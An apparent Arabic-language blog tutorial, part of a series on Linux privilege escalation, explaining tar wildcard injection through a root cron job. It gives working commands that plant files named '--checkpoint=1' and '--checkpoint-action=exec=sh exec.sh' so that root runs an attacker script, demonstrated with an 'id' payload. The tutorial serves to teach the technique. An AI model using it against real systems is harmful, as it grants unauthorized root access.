pt3[linux privilege escalation techniques] Wildcard Injection
السلام عليكم ورحمة الله وبركاتة،
تكمله لسلسة Linux Privilege Escalation techniques راح نتكلم عن Wildcard injection
في البداية ناخذ تعريف عن Wildcard injection بكل بساطة هي رموز في اللينكس[?]([]) [*] مميزه يرمز على الجميع،
تستخدم مع جميع الباينيري على الينكس. مثال على ذالك ناخذ امر مع wildcard &ls
لو فرضنا لدينا مجلد يحتوي على كثير من انواع متعدده من الملفات بامتدادات مختلفه ونريد ان نظهر فقط الملفات التي بمتداد gif مثلا، الامر يكون كالتالي بستخدام wildcard
ls -lia *.gif
مثل مانلاحظ قام بستخراج جميع الملفات الموجوده داخل الملجلد تحت امتداد gif
طيب الان بعد ماعرفنا ماهو wildcard واستخدامه، نجي لزبده الموضوع كيف يتم التصعيد من wildcard
التكنيك المستخدم wildcard injection كثيره ولكن راح اتطرق على للب او اساس الموضوع حتى اترك لكم ساحة التفكير ، في البداية راح ابسط فكرة الحقن , لنفرض
ا) الروت قام بعمل cron job للامر tar كل ٥ دقائق على مجلد /home/example/*
ب) الهكر لديه التصريح على ملجد example
الفكرة الهكر يقوم بحقن متغير معين في الباينيري tar يسمح له بالاتصال ع باينيري اخر مثلا bin/bash -i
يحصل على interactive shell من الباش بصلاحيات الروت عندما يقوم بتنفيذ امر الضغط كل خمس دقائق وينفذ الحقن الذي قام به الهكر في المجلد ناخذ مثال/فكرة في الية الحقن،
echo "" > --help
ls * سوف يقوم بطابعه واجهه help بدلا من عرض الملفات والمجلدات للجميع. اعتقد وضحت الفكرة
الان ناخذ مثال
نلاحظ هنا ، وجود كرون جوب كل ١٠ دقائق يقوم بعمل ضغط لملجلد /tmp/backup/* باستخدام wildcard
دخلنا المجلد ووجدنا انه لدينا صلاحيات كامله في المجلد نقوم بحقن امر checkpoints في tar حتى
echo "id > tt.txt;chmod 777 tt.txt" > exec.sh
chmod +x exec.sh
echo "" > --checkpoint=1
echo "" > "--checkpoint-action=exec=sh exec.sh"
بعد الانتظار ١٠دقائق نلاحظ بأن الملف tt.txt موجود نقوم بالقراءه والناتج
دمتم بود.
تعليقات
إرسال تعليق